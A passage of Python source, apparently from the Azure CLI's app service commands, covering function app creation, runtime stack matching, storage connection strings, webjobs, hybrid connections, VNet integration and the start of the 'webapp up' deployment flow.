client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if deployment_container_image_name is None:
site_config.linux_fx_version = site_config_json[KEYS.LINUX_FX_VERSION]
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding appsetting to site to make it a function
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
if disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
return float(version_string)
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log deployment show
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
